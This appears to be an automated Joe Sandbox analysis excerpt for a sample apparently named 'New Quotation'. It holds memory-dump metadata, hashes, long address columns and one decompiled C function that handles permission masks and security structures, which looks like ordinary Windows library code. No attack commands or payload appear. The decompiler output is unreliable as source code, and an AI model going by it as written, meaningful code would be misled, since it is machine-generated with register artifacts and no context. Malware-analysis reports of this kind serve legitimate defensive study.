                                                                                                                                                                                          0x1d850d8b
                                                                                                                                                                                          0x1d850d8f
                                                                                                                                                                                          0x1d850d93
                                                                                                                                                                                          0x1d850d9b
                                                                                                                                                                                          0x1d850d9f
                                                                                                                                                                                          0x1d850da3
                                                                                                                                                                                          0x1d850da7
                                                                                                                                                                                          0x1d850daf
                                                                                                                                                                                          0x1d850db3
                                                                                                                                                                                          0x1d850db3
                                                                                                                                                                                          0x1d850d31
                                                                                                                                                                                          0x1d850dbc
                                                                                                                                                                                          0x1d850dbd
                                                                                                                                                                                          0x1d850dc8

                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: LdrCreateEnclave
                                                                                                                                                                                          • API String ID: 0-3262589265
                                                                                                                                                                                          • Opcode ID: 0836268200ac88bab5e3cb161cc8f83cca303d90d9f944682a80c20639e6d85b
                                                                                                                                                                                          • Instruction ID: 5765313ed8772faed15a79400ca6a60ccf4dc4fe22bcd5fdf6aa56c48f0860db
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0836268200ac88bab5e3cb161cc8f83cca303d90d9f944682a80c20639e6d85b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0821C4B1508354DFC310CF299844A9BFBE8BBD5B50F504A1EF9A497260D7B1A505CF93
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D867CE8 Relevance: .6, Instructions: 617COMMONCrypto
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 96%
                                                                                                                                                                                          			E1D867CE8(intOrPtr __ecx, signed int __edx, void* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int* _a28) {
				signed int _v8;
				char _v48;
				char _v56;
				signed int _v96;
				char _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				char _v117;
				char _v118;
				signed int _v124;
				signed int* _v128;
				char _v129;
				char _v130;
				signed int _v136;
				signed int* _v140;
				signed int _v144;
				signed int _v148;
				short _v152;
				signed int _v156;
				intOrPtr _v160;
				signed int* _v164;
				signed int _v168;
				signed int _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				signed int _v204;
				char _v208;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t282;
				signed int _t287;
				signed int _t289;
				signed int _t290;
				signed int _t299;
				intOrPtr* _t305;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t313;
				signed char _t320;
				signed int _t324;
				signed int _t325;
				signed int _t340;
				signed int _t355;
				char _t361;
				signed short _t362;
				signed int _t369;
				signed int _t379;
				signed int _t381;
				signed int _t382;
				signed int _t405;
				signed int _t410;
				signed int _t413;
				signed int _t417;
				signed int _t418;
				intOrPtr _t419;
				unsigned int _t420;
				signed int _t421;
				signed int _t424;
				signed int _t425;
				signed int _t426;
				intOrPtr _t433;
				signed int _t435;
				signed char* _t438;
				intOrPtr _t444;
				signed int _t446;
				intOrPtr _t447;
				signed int _t449;
				signed int _t451;
				signed int _t452;
				intOrPtr _t453;
				signed int _t454;
				signed int _t455;
				signed int _t456;
				signed int* _t460;
				signed int _t463;
				signed int _t464;
				signed int _t472;
				signed int _t473;
				signed char _t479;
				intOrPtr _t480;
				signed int _t482;
				signed int _t484;
				signed char _t488;
				signed int _t492;
				signed int _t495;
				signed char _t499;
				signed int _t502;
				intOrPtr _t504;
				intOrPtr* _t505;
				signed int _t506;
				signed int _t507;
				signed int _t508;
				signed int _t511;
				signed int _t512;
				signed short _t513;
				signed int _t514;
				signed int* _t517;
				signed int* _t518;
				signed int _t519;
				intOrPtr _t520;
				signed int _t523;
				signed int* _t525;
				signed int _t527;
				void* _t528;

				_t466 = __edx;
				_v8 =  *0x1d8cb370 ^ _t527;
				_t417 = __edx;
				_v124 = __edx;
				_v180 = __ecx;
				_v176 = _a12;
				_v200 = _a16;
				_v140 = _a24;
				_v112 = 0;
				_v144 = 0;
				_v168 = 0;
				_v156 = 0;
				_t517 = _a28;
				_v128 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_v164 = _t517;
				_v152 = 0x300;
				_t282 = E1D7F82F0( &_v104,  &_v156, 1);
				_t503 = _t282;
				if(_t282 < 0) {
					L16:
					return E1D814B50(_t503, _t417, _v8 ^ _t527, _t466, _t503, _t517);
				}
				_v96 = _v96 & 0x00000000;
				_t287 = E1D7F82F0( &_v56,  &_v156, 1);
				_t503 = _t287;
				if(_t287 < 0) {
					goto L16;
				}
				_t504 = _v180;
				 *_t517 = 0x400;
				_v48 = 1;
				 *_v140 =  *_v140 & 0x00000000;
				_t532 = _t504;
				if(_t504 == 0) {
					L5:
					_push(_t417);
					_t289 = E1D7F3770(_t417, _t504, _t517, __eflags);
					__eflags = _t289;
					if(_t289 == 0) {
						L4:
						_t503 = 0xc0000077;
						goto L16;
					}
					_t290 = _a4;
					_v156 = _t290;
					__eflags = _t290;
					asm("sbb eax, eax");
					_t299 = E1D7F7882(_t504, 0, 0, _a8, 1, 0,  &_v104,  &_v56,  &_v104,  &_v56, _a20, 2,  ~_t290 &  &_a4, 0 | _t290 != 0x00000000,  &_v112,  &_v130,  &_v208);
					_t466 = _v112;
					_t503 = _t299;
					_v172 = _t466;
					__eflags = _t503 - 0x8000000b;
					if(_t503 != 0x8000000b) {
						__eflags = _t503;
						if(_t503 < 0) {
							L11:
							_t517 = _v128;
							L12:
							__eflags = _t466;
							if(_t466 != 0) {
								E1D7E3BC0(_t517, 0, _t466);
							}
							_t417 = _v144;
							__eflags = _t417;
							if(_t417 != 0) {
								E1D7E3BC0(_t517, 0, _t417);
							}
							goto L16;
						}
						_t433 =  *0x1d8c5d78; // 0x0
						_t472 = E1D7E5D90(_t433 + 0x140000, _v128, _t433 + 0x140000, ( *(_t417 + 4) & 0x0000ffff) * 0x18);
						_v168 = _t472;
						__eflags = _t472;
						if(_t472 != 0) {
							_v148 = _v148 & 0x00000000;
							_t305 = _t417 + 8;
							_v136 = _v136 & 0x00000000;
							_t505 = _t305;
							_v160 = _t305;
							_t306 =  *(_t417 + 4) & 0x0000ffff;
							_t435 = _t306;
							__eflags = _v136 - _t306;
							if(_v136 >= _t306) {
								L31:
								_t473 = _v172;
								_v136 = _v136 & 0x00000000;
								_t307 = _t435 & 0x0000ffff;
								_t506 = _t473 + 8;
								_v112 = _t506;
								__eflags = 0 -  *((intOrPtr*)(_t473 + 4));
								if(0 >=  *((intOrPtr*)(_t473 + 4))) {
									L53:
									_t308 = _t307 & 0x0000ffff;
									_v118 = 0;
									_t507 = 0;
									_v117 = 0;
									_v108 = 0;
									_t438 = _t417 + 8;
									_v112 = 0;
									_v184 = _t308;
									__eflags = _t308;
									if(_t308 == 0) {
										L68:
										__eflags = _v156;
										asm("sbb ecx, ecx");
										_t503 = E1D7F7882(_v180, 0, 0, _a8, 1, 0, _v176, _v200, _v176, _v200, _a20, 2,  ~_v156 &  &_a4, 0 | _v156 != 0x00000000,  &_v144,  &_v130,  &_v208);
										__eflags = _t503;
										if(_t503 < 0) {
											L95:
											_t313 = _v168;
											_t517 = _v128;
											__eflags = _t313;
											if(_t313 != 0) {
												E1D7E3BC0(_t517, 0, _t313);
											}
											_t466 = _v172;
											goto L12;
										}
										_t508 = _v144;
										_t444 =  *0x1d8c5d78; // 0x0
										_t446 = E1D7E5D90(_t444 + 0x140000, _v128, _t444 + 0x140000, ( *(_t508 + 2) & 0x0000ffff) + _v108);
										 *_v140 = _t446;
										__eflags = _t446;
										if(_t446 == 0) {
											L93:
											_t503 = 0xc0000017;
											goto L95;
										}
										_t479 =  *_t417;
										_t320 =  *_t508;
										__eflags = _t320 - _t479;
										if(_t320 <= _t479) {
											_t320 = _t479;
										}
										_t324 = E1D7F7C20(_t446, ( *(_t508 + 2) & 0x0000ffff) + _v108, _t320 & 0x000000ff);
										__eflags = _t324;
										if(_t324 < 0) {
											goto L7;
										} else {
											_t480 = 0;
											_v176 = 0;
											_t451 =  *_v140 + 8;
											_v108 = _t451;
											__eflags = 0 -  *(_t417 + 4);
											if(0 >=  *(_t417 + 4)) {
												L87:
												_t418 = _v144;
												E1D8188C0(_t451, _t418 + 8, ( *(_t508 + 2) & 0x0000ffff) - 8);
												_t528 = _t528 + 0xc;
												_t452 =  *_v140;
												_t259 = _t452 + 4;
												 *_t259 =  *(_t452 + 4) +  *((intOrPtr*)(_t418 + 4));
												__eflags =  *_t259;
												L88:
												_t417 = _v124;
												L89:
												_t325 =  *_t517;
												_t503 = 0;
												__eflags = _t325 & 0x00001000;
												if((_t325 & 0x00001000) == 0) {
													goto L95;
												}
												_t518 = _v140;
												__eflags =  *_t518;
												if( *_t518 != 0) {
													E1D7E3BC0(_v128, 0,  *_t518);
													 *_t518 =  *_t518 & 0;
													__eflags =  *_t518;
												}
												_t447 =  *0x1d8c5d78; // 0x0
												_t449 = E1D7E5D90(_t447 + 0x140000, _v128, _t447 + 0x140000,  *(_t417 + 2) & 0x0000ffff);
												 *_t518 = _t449;
												__eflags = _t449;
												if(_t449 != 0) {
													E1D8188C0(_t449, _t417,  *(_t417 + 2) & 0x0000ffff);
													_t503 = 0;
													__eflags = 0;
													goto L95;
												} else {
													goto L93;
												}
											}
											_t519 = _t451;
											_t340 = _v168 + 0x10;
											__eflags = _t340;
											_t453 = _t417 + 8;
											_v112 = _t340;
											do {
												_t511 =  *(_t340 - 4) |  *(_t340 + 4) |  *_t340;
												__eflags = _t511;
												if(_t511 == 0) {
													goto L85;
												}
												_t419 = _v160;
												E1D8188C0(_t519, _t419,  *(_t419 + 2) & 0x0000ffff);
												 *(_t519 + 1) =  *(_t519 + 1) & 0x000000ef;
												_t454 = _t519;
												_t528 = _t528 + 0xc;
												_t519 = _t519 + ( *(_t419 + 2) & 0x0000ffff);
												_v180 = _t454;
												_v108 = _t519;
												 *((short*)( *_v140 + 4)) =  *((short*)( *_v140 + 4)) + 1;
												 *(_t454 + 4) =  *(_t419 + 4) & _t511;
												_t420 = 0x80000000;
												_t512 = _t511 &  !( *(_t419 + 4));
												__eflags = _t512;
												if(_t512 == 0) {
													L84:
													_t239 = _t454 + 4;
													 *_t239 =  *(_t454 + 4) | _t512;
													__eflags =  *_t239;
													_t340 = _v112;
													_t417 = _v124;
													_t480 = _v176;
													_t453 = _v160;
													goto L85;
												}
												_t520 = _v160;
												do {
													__eflags = _t420 - 0x10000000;
													if(_t420 < 0x10000000) {
														break;
													}
													__eflags =  *(_t520 + 4) & _t420;
													if(( *(_t520 + 4) & _t420) != 0) {
														_v136 = _t420;
														E1D7F83E0( &_v136, _a20);
														_t355 = _v136;
														_t454 = _v180;
														__eflags = _t512 & _t355;
														if((_t512 & _t355) != 0) {
															 *(_t454 + 4) =  *(_t454 + 4) | _t420;
															_t512 = _t512 &  !_t355;
															__eflags = _t512;
														}
													}
													_t420 = _t420 >> 1;
													__eflags = _t512;
												} while (_t512 != 0);
												_t519 = _v108;
												goto L84;
												L85:
												_t480 = _t480 + 1;
												_v112 = _t340 + 0x18;
												_t453 = _t453 + ( *(_t453 + 2) & 0x0000ffff);
												_v176 = _t480;
												__eflags = _t480 - ( *(_t417 + 4) & 0x0000ffff);
												_v160 = _t453;
												_t340 = _v112;
											} while (_t480 < ( *(_t417 + 4) & 0x0000ffff));
											_t517 = _v164;
											_t451 = _v108;
											_t508 = _v144;
											goto L87;
										}
									}
									_t482 = _v168 + 0x10;
									__eflags = _t482;
									do {
										__eflags =  *(_t482 - 4) |  *(_t482 + 4) |  *_t482;
										_t361 =  *((intOrPtr*)(( *_t438 & 0x000000ff) + 0x1d7a8980));
										if(( *(_t482 - 4) |  *(_t482 + 4) |  *_t482) != 0) {
											_t513 = _t438[2] & 0x0000ffff;
											_v108 = _v108 + _t513;
											_v129 = _t361;
											__eflags = _t361;
											if(_t361 != 0) {
												L64:
												__eflags = _v129 - 1;
												_t362 = _t513;
												if(_v129 != 1) {
													L66:
													_t507 = _v112;
													goto L67;
												}
												__eflags = _v118;
												if(_v118 != 0) {
													goto L7;
												}
												goto L66;
											}
											__eflags = _v117 - _t361;
											if(_v117 != _t361) {
												goto L7;
											}
											goto L64;
										}
										__eflags = _t361;
										if(_t361 == 0) {
											_v118 = 1;
										}
										__eflags = _t361 - 1;
										if(_t361 == 1) {
											_v117 = _t361;
										}
										_t362 = _t438[2] & 0x0000ffff;
										L67:
										_t507 = _t507 + 1;
										_t482 = _t482 + 0x18;
										_v112 = _t507;
										_t438 =  &(_t438[_t362 & 0x0000ffff]);
										__eflags = _t507 - _v184;
									} while (_t507 < _v184);
									goto L68;
								} else {
									goto L32;
								}
								while(1) {
									L32:
									_t421 =  *_t506;
									__eflags = _t421 - 8;
									if(_t421 > 8) {
										break;
									}
									__eflags = _t421 - 4;
									if(_t421 == 4) {
										break;
									}
									_v116 =  *((intOrPtr*)(_t506 + 4));
									E1D7F83E0( &_v116, _a20);
									__eflags = _t421;
									if(_t421 == 0) {
										L40:
										_t455 =  *(_a20 + 0xc);
										L41:
										_t456 = _t455 & _v116;
										__eflags = _t456;
										if(_t456 == 0) {
											L61:
											_t417 = _v124;
											L51:
											_t506 = _t506 + ( *(_t506 + 2) & 0x0000ffff);
											_t369 = _v172;
											_t484 = _v136 + 1;
											_v136 = _t484;
											_v112 = _t506;
											__eflags = _t484 - ( *(_t369 + 4) & 0x0000ffff);
											if(_t484 < ( *(_t369 + 4) & 0x0000ffff)) {
												continue;
											}
											_t307 =  *(_t417 + 4) & 0x0000ffff;
											goto L53;
										}
										_t488 =  !( *(_t506 + 1) & 0x000000ff) & 0x00000008 |  *(_t506 + 1) & 3;
										__eflags = _t488;
										if(_t488 == 0) {
											goto L61;
										}
										asm("sbb ebx, ebx");
										_t424 =  ~(_t488 & 2) & _t456;
										_v188 = _t424;
										_v108 = _t424;
										_t417 = _v124;
										asm("sbb eax, eax");
										_t379 =  ~(_t488 & 1) & _t456;
										_v184 = _t379;
										_v116 = _t379;
										asm("sbb edx, edx");
										_v192 = _v192 & 0x00000000;
										_t492 =  ~(_t488 & 8) & _t456;
										_t458 = _v160;
										_t514 = _t492;
										__eflags = 0 -  *(_t417 + 4);
										_t517 = _v164;
										_v204 = _t492;
										_v196 = _v160;
										if(0 >=  *(_t417 + 4)) {
											L49:
											__eflags = _t514 | _v116 | _v108;
											if((_t514 | _v116 | _v108) != 0) {
												goto L7;
											}
											_t506 = _v112;
											goto L51;
										}
										_v116 = _t379;
										_t381 = _v168 + 0x14;
										__eflags = _t381;
										_v108 = _v188;
										_t523 = _v112;
										_v148 = _t381;
										do {
											_t382 = E1D7F8535(_t523, _t458, _v176, _v200);
											_t460 = _v148;
											__eflags = _t382;
											if(_t382 != 0) {
												_t514 = _t514 &  !( *(_t460 - 0xc));
												_v108 = _v108 &  !( *(_t460 - 0x14));
												_v116 = _v116 &  !( *(_t460 - 0x10));
												 *_t460 =  *_t460 &  !_v204;
												 *(_t460 - 8) =  *(_t460 - 8) &  !_v188;
												_t140 = _t460 - 4;
												 *_t140 =  *(_t460 - 4) &  !_v184;
												__eflags =  *_t140;
											}
											_v148 =  &(_t460[6]);
											_t495 = _v192 + 1;
											_t462 = _v196;
											_v192 = _t495;
											_t458 = _v196 + ( *(_t462 + 2) & 0x0000ffff);
											_v196 = _v196 + ( *(_t462 + 2) & 0x0000ffff);
											__eflags = _t495 - ( *(_t417 + 4) & 0x0000ffff);
										} while (_t495 < ( *(_t417 + 4) & 0x0000ffff));
										_t517 = _v164;
										goto L49;
									}
									__eflags = _t421 - 1;
									if(_t421 == 1) {
										goto L40;
									}
									__eflags = _t421 - 5;
									if(_t421 == 5) {
										goto L40;
									}
									__eflags = _t421 - 6;
									if(_t421 == 6) {
										goto L40;
									}
									_t455 =  *(_a20 + 0xc) | 0x01000000;
									goto L41;
								}
								L39:
								 *_t517 =  *_t517 | 0x00001000;
								goto L88;
							}
							_v116 = _t472 + 4;
							while(1) {
								_t425 =  *_t505;
								__eflags = _t425 - 8;
								if(_t425 > 8) {
									goto L39;
								}
								__eflags = _t425 - 4;
								if(_t425 == 4) {
									goto L39;
								}
								_v108 =  *((intOrPtr*)(_t505 + 4));
								E1D7F83E0( &_v108, _a20);
								__eflags = _t425;
								if(_t425 == 0) {
									L26:
									_t463 =  *(_a20 + 0xc);
									L27:
									_t464 = _t463 & _v108;
									_t499 =  !( *(_t505 + 1) & 0x000000ff) & 0x00000008 |  *(_t505 + 1) & 3;
									_t405 = _v116;
									__eflags = _t499 & 0x00000002;
									if((_t499 & 0x00000002) == 0) {
										_t426 = 0;
										_t75 =  &_v112;
										 *_t75 = _v112 & 0;
										__eflags =  *_t75;
									} else {
										_t426 = _t464;
										_v112 = _t464;
									}
									 *(_t405 + 8) = _v112;
									_t525 = _v116;
									asm("sbb eax, eax");
									 *(_t525 - 4) = _t426;
									_t417 = _v124;
									_t410 =  ~(_t499 & 1) & _t464;
									 *_t525 = _t410;
									_t525[3] = _t410;
									asm("sbb eax, eax");
									_t413 =  ~(_t499 & 8) & _t464;
									_t502 = _v148 + 1;
									_t525[1] = _t413;
									_t525[4] = _t413;
									_t435 =  *(_t417 + 4) & 0x0000ffff;
									_t505 = _t505 + ( *(_t505 + 2) & 0x0000ffff);
									_v116 =  &(_t525[6]);
									_t517 = _v164;
									_v148 = _t502;
									__eflags = _t502 - _t435;
									if(_t502 < _t435) {
										continue;
									} else {
										goto L31;
									}
								}
								__eflags = _t425 - 1;
								if(_t425 == 1) {
									goto L26;
								}
								__eflags = _t425 - 5;
								if(_t425 == 5) {
									goto L26;
								}
								__eflags = _t425 - 6;
								if(_t425 == 6) {
									goto L26;
								}
								_t463 =  *(_a20 + 0xc) | 0x01000000;
								goto L27;
							}
							goto L39;
						} else {
							_t466 = _v172;
							_t503 = 0xc0000017;
							goto L11;
						}
					}
					L7:
					 *_t517 =  *_t517 | 0x00001000;
					goto L89;
				}
				_push(_t504);
				if(E1D7F3770(_t417, _t504, _t517, _t532) != 0) {
					goto L5;
				}
				goto L4;
			}




















































































































                                                                                                                                                                                          0x1d867ce8
                                                                                                                                                                                          0x1d867cfa
                                                                                                                                                                                          0x1d867d00
                                                                                                                                                                                          0x1d867d02
                                                                                                                                                                                          0x1d867d05
                                                                                                                                                                                          0x1d867d0e
                                                                                                                                                                                          0x1d867d17
                                                                                                                                                                                          0x1d867d20
                                                                                                                                                                                          0x1d867d28
                                                                                                                                                                                          0x1d867d2b
                                                                                                                                                                                          0x1d867d31
                                                                                                                                                                                          0x1d867d37
                                                                                                                                                                                          0x1d867d43
                                                                                                                                                                                          0x1d867d49
                                                                                                                                                                                          0x1d867d59
                                                                                                                                                                                          0x1d867d5f
                                                                                                                                                                                          0x1d867d68
                                                                                                                                                                                          0x1d867d6d
                                                                                                                                                                                          0x1d867d71
                                                                                                                                                                                          0x1d867ea1
                                                                                                                                                                                          0x1d867eb1
                                                                                                                                                                                          0x1d867eb1
                                                                                                                                                                                          0x1d867d77
                                                                                                                                                                                          0x1d867d88
                                                                                                                                                                                          0x1d867d8d
                                                                                                                                                                                          0x1d867d91
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d867d9d
                                                                                                                                                                                          0x1d867da3
                                                                                                                                                                                          0x1d867da9
                                                                                                                                                                                          0x1d867db0
                                                                                                                                                                                          0x1d867db3
                                                                                                                                                                                          0x1d867db5
                                                                                                                                                                                          0x1d867dcb
                                                                                                                                                                                          0x1d867dcb
                                                                                                                                                                                          0x1d867dcc
                                                                                                                                                                                          0x1d867dd1
                                                                                                                                                                                          0x1d867dd3
                                                                                                                                                                                          0x1d867dc1
                                                                                                                                                                                          0x1d867dc1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d867dc1
                                                                                                                                                                                          0x1d867dd5
                                                                                                                                                                                          0x1d867ddd
                                                                                                                                                                                          0x1d867de3
                                                                                                                                                                                          0x1d867dea
                                                                                                                                                                                          0x1d867e23
                                                                                                                                                                                          0x1d867e28
                                                                                                                                                                                          0x1d867e2b
                                                                                                                                                                                          0x1d867e2d
                                                                                                                                                                                          0x1d867e33
                                                                                                                                                                                          0x1d867e39
                                                                                                                                                                                          0x1d867e46
                                                                                                                                                                                          0x1d867e48
                                                                                                                                                                                          0x1d867e7e
                                                                                                                                                                                          0x1d867e7e
                                                                                                                                                                                          0x1d867e81
                                                                                                                                                                                          0x1d867e81
                                                                                                                                                                                          0x1d867e83
                                                                                                                                                                                          0x1d867e89
                                                                                                                                                                                          0x1d867e89
                                                                                                                                                                                          0x1d867e8e
                                                                                                                                                                                          0x1d867e94
                                                                                                                                                                                          0x1d867e96
                                                                                                                                                                                          0x1d867e9c
                                                                                                                                                                                          0x1d867e9c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d867e96
                                                                                                                                                                                          0x1d867e4e
                                                                                                                                                                                          0x1d867e67
                                                                                                                                                                                          0x1d867e69
                                                                                                                                                                                          0x1d867e6f
                                                                                                                                                                                          0x1d867e71
                                                                                                                                                                                          0x1d867eb4
                                                                                                                                                                                          0x1d867ebb
                                                                                                                                                                                          0x1d867ebe
                                                                                                                                                                                          0x1d867ec5
                                                                                                                                                                                          0x1d867ec7
                                                                                                                                                                                          0x1d867ecd
                                                                                                                                                                                          0x1d867ed1
                                                                                                                                                                                          0x1d867ed3
                                                                                                                                                                                          0x1d867eda
                                                                                                                                                                                          0x1d867fb8
                                                                                                                                                                                          0x1d867fb8
                                                                                                                                                                                          0x1d867fbe
                                                                                                                                                                                          0x1d867fc5
                                                                                                                                                                                          0x1d867fca
                                                                                                                                                                                          0x1d867fcd
                                                                                                                                                                                          0x1d867fd0
                                                                                                                                                                                          0x1d867fd4
                                                                                                                                                                                          0x1d86819c
                                                                                                                                                                                          0x1d86819e
                                                                                                                                                                                          0x1d8681a1
                                                                                                                                                                                          0x1d8681a4
                                                                                                                                                                                          0x1d8681a6
                                                                                                                                                                                          0x1d8681a9
                                                                                                                                                                                          0x1d8681ac
                                                                                                                                                                                          0x1d8681af
                                                                                                                                                                                          0x1d8681b2
                                                                                                                                                                                          0x1d8681b8
                                                                                                                                                                                          0x1d8681ba
                                                                                                                                                                                          0x1d868235
                                                                                                                                                                                          0x1d868240
                                                                                                                                                                                          0x1d868247
                                                                                                                                                                                          0x1d86828a
                                                                                                                                                                                          0x1d86828c
                                                                                                                                                                                          0x1d86828e
                                                                                                                                                                                          0x1d86849a
                                                                                                                                                                                          0x1d86849a
                                                                                                                                                                                          0x1d8684a0
                                                                                                                                                                                          0x1d8684a3
                                                                                                                                                                                          0x1d8684a5
                                                                                                                                                                                          0x1d8684ab
                                                                                                                                                                                          0x1d8684ab
                                                                                                                                                                                          0x1d8684b0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8684b0
                                                                                                                                                                                          0x1d868294
                                                                                                                                                                                          0x1d86829a
                                                                                                                                                                                          0x1d8682b7
                                                                                                                                                                                          0x1d8682bf
                                                                                                                                                                                          0x1d8682c1
                                                                                                                                                                                          0x1d8682c3
                                                                                                                                                                                          0x1d868482
                                                                                                                                                                                          0x1d868482
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d868482
                                                                                                                                                                                          0x1d8682c9
                                                                                                                                                                                          0x1d8682cd
                                                                                                                                                                                          0x1d8682cf
                                                                                                                                                                                          0x1d8682d1
                                                                                                                                                                                          0x1d8682d3
                                                                                                                                                                                          0x1d8682d3
                                                                                                                                                                                          0x1d8682e2
                                                                                                                                                                                          0x1d8682e7
                                                                                                                                                                                          0x1d8682e9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8682ef
                                                                                                                                                                                          0x1d8682f5
                                                                                                                                                                                          0x1d8682f7
                                                                                                                                                                                          0x1d868301
                                                                                                                                                                                          0x1d868304
                                                                                                                                                                                          0x1d868307
                                                                                                                                                                                          0x1d86830b
                                                                                                                                                                                          0x1d868410
                                                                                                                                                                                          0x1d868414
                                                                                                                                                                                          0x1d868423
                                                                                                                                                                                          0x1d86842e
                                                                                                                                                                                          0x1d868431
                                                                                                                                                                                          0x1d868437
                                                                                                                                                                                          0x1d868437
                                                                                                                                                                                          0x1d868437
                                                                                                                                                                                          0x1d86843b
                                                                                                                                                                                          0x1d86843b
                                                                                                                                                                                          0x1d86843e
                                                                                                                                                                                          0x1d86843e
                                                                                                                                                                                          0x1d868440
                                                                                                                                                                                          0x1d868442
                                                                                                                                                                                          0x1d868447
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d868449
                                                                                                                                                                                          0x1d86844f
                                                                                                                                                                                          0x1d868451
                                                                                                                                                                                          0x1d868459
                                                                                                                                                                                          0x1d86845e
                                                                                                                                                                                          0x1d86845e
                                                                                                                                                                                          0x1d86845e
                                                                                                                                                                                          0x1d868460
                                                                                                                                                                                          0x1d86847a
                                                                                                                                                                                          0x1d86847c
                                                                                                                                                                                          0x1d86847e
                                                                                                                                                                                          0x1d868480
                                                                                                                                                                                          0x1d868490
                                                                                                                                                                                          0x1d868498
                                                                                                                                                                                          0x1d868498
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d868480
                                                                                                                                                                                          0x1d868317
                                                                                                                                                                                          0x1d868319
                                                                                                                                                                                          0x1d868319
                                                                                                                                                                                          0x1d86831c
                                                                                                                                                                                          0x1d86831f
                                                                                                                                                                                          0x1d868322
                                                                                                                                                                                          0x1d868328
                                                                                                                                                                                          0x1d868328
                                                                                                                                                                                          0x1d86832a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d868330
                                                                                                                                                                                          0x1d86833d
                                                                                                                                                                                          0x1d868342
                                                                                                                                                                                          0x1d868346
                                                                                                                                                                                          0x1d86834c
                                                                                                                                                                                          0x1d86834f
                                                                                                                                                                                          0x1d868351
                                                                                                                                                                                          0x1d86835d
                                                                                                                                                                                          0x1d868362
                                                                                                                                                                                          0x1d86836b
                                                                                                                                                                                          0x1d868371
                                                                                                                                                                                          0x1d868378
                                                                                                                                                                                          0x1d868378
                                                                                                                                                                                          0x1d86837a
                                                                                                                                                                                          0x1d8683c4
                                                                                                                                                                                          0x1d8683c4
                                                                                                                                                                                          0x1d8683c4
                                                                                                                                                                                          0x1d8683c4
                                                                                                                                                                                          0x1d8683c7
                                                                                                                                                                                          0x1d8683ca
                                                                                                                                                                                          0x1d8683cd
                                                                                                                                                                                          0x1d8683d3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8683d3
                                                                                                                                                                                          0x1d86837c
                                                                                                                                                                                          0x1d868382
                                                                                                                                                                                          0x1d868382
                                                                                                                                                                                          0x1d868388
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d86838a
                                                                                                                                                                                          0x1d86838d
                                                                                                                                                                                          0x1d868398
                                                                                                                                                                                          0x1d86839f
                                                                                                                                                                                          0x1d8683a4
                                                                                                                                                                                          0x1d8683aa
                                                                                                                                                                                          0x1d8683b0
                                                                                                                                                                                          0x1d8683b2
                                                                                                                                                                                          0x1d8683b4
                                                                                                                                                                                          0x1d8683b9
                                                                                                                                                                                          0x1d8683b9
                                                                                                                                                                                          0x1d8683b9
                                                                                                                                                                                          0x1d8683b2
                                                                                                                                                                                          0x1d8683bb
                                                                                                                                                                                          0x1d8683bd
                                                                                                                                                                                          0x1d8683bd
                                                                                                                                                                                          0x1d8683c1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8683d9
                                                                                                                                                                                          0x1d8683dc
                                                                                                                                                                                          0x1d8683dd
                                                                                                                                                                                          0x1d8683e4
                                                                                                                                                                                          0x1d8683e6
                                                                                                                                                                                          0x1d8683f0
                                                                                                                                                                                          0x1d8683f2
                                                                                                                                                                                          0x1d8683f8
                                                                                                                                                                                          0x1d8683f8
                                                                                                                                                                                          0x1d868401
                                                                                                                                                                                          0x1d868407
                                                                                                                                                                                          0x1d86840a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d86840a
                                                                                                                                                                                          0x1d8682e9
                                                                                                                                                                                          0x1d8681c2
                                                                                                                                                                                          0x1d8681c2
                                                                                                                                                                                          0x1d8681c5
                                                                                                                                                                                          0x1d8681cb
                                                                                                                                                                                          0x1d8681d0
                                                                                                                                                                                          0x1d8681d6
                                                                                                                                                                                          0x1d8681f5
                                                                                                                                                                                          0x1d8681f9
                                                                                                                                                                                          0x1d8681fc
                                                                                                                                                                                          0x1d8681ff
                                                                                                                                                                                          0x1d868201
                                                                                                                                                                                          0x1d86820c
                                                                                                                                                                                          0x1d86820c
                                                                                                                                                                                          0x1d868210
                                                                                                                                                                                          0x1d868212
                                                                                                                                                                                          0x1d86821e
                                                                                                                                                                                          0x1d86821e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d86821e
